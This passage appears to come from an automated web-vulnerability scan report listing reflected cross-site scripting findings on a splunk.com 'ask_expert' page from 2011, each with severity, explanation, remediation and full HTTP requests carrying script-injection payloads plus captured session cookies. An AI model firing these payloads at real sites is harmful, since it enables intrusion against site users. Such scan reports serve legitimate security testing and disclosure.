GET /pagee5a84--><script>alert(1)</script>e63bcaac2f5/ask_expert HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:11:58 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:41:58 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:41:58 GMT; path=/ ETag: d8f17efd290a71056151b6db8e77240e1296943918 Last-Modified: Sat, 05 Feb 2011 22:11:58 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18331
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload ff0af--><script>alert(1)</script>b24bec51a10 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/ask_expertff0af--><script>alert(1)</script>b24bec51a10 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:12:26 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18220
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.418. http://www.splunk.com/page/ask_expert [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /page/ask_expert
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e72c8--><script>alert(1)</script>60baae66c98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/ask_expert?e72c8--><script>alert(1)</script>60baae66c98=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:11:23 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: ed1b440906b133bac79d122949e306301296943884 Last-Modified: Sat, 05 Feb 2011 22:11:24 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34133
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 9a7f4--><script>alert(1)</script>95d8c031fc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page9a7f4--><script>alert(1)</script>95d8c031fc2/ask_expert/default/4396 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:36:23 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 23:06:23 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 23:06:23 GMT; path=/ ETag: 5e8994be735b98634123acbbdb03890c1296945383 Last-Modified: Sat, 05 Feb 2011 22:36:23 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18383
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload fa7de--><script>alert(1)</script>5b63b041d74 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/ask_expertfa7de--><script>alert(1)</script>5b63b041d74/default/4396 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:36:47 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18272
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload b8a52--><script>alert(1)</script>3547d2d94f9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/ask_expert/defaultb8a52--><script>alert(1)</script>3547d2d94f9/4396 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:37:16 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: c34c1c0a5147c476eaa02f21848d44d31296945437 Last-Modified: Sat, 05 Feb 2011 22:37:17 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34259
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2d76"><script>alert(1)</script>3d5ddbca352 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /page/ask_expert/defaultf2d76"><script>alert(1)</script>3d5ddbca352/4396 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:36:58 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 9e97e825910a89ef2fe76db31616422a1296945418 Last-Modified: Sat, 05 Feb 2011 22:36:58 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34257
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into an HTML comment. The payload ff968--><script>alert(1)</script>739ba485257 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/ask_expert/default/4396ff968--><script>alert(1)</script>739ba485257 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:38:04 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34245
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49dc8"><a>0cc82e0c8b7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /page/ask_expert/default/439649dc8"><a>0cc82e0c8b7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:37:29 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34158
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.425. http://www.splunk.com/page/ask_expert/default/4396 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /page/ask_expert/default/4396
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8eb41--><script>alert(1)</script>93274ebcacf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/ask_expert/default/4396?8eb41--><script>alert(1)</script>93274ebcacf=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:35:39 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34203
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.426. http://www.splunk.com/page/ask_expert/default/4396 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.splunk.com
Path: /page/ask_expert/default/4396
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7b7e"><a>df87e49d911 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /page/ask_expert/default/4396?f7b7e"><a>df87e49d911=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:35:09 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34143
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 383a8--><script>alert(1)</script>74d4e36369d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
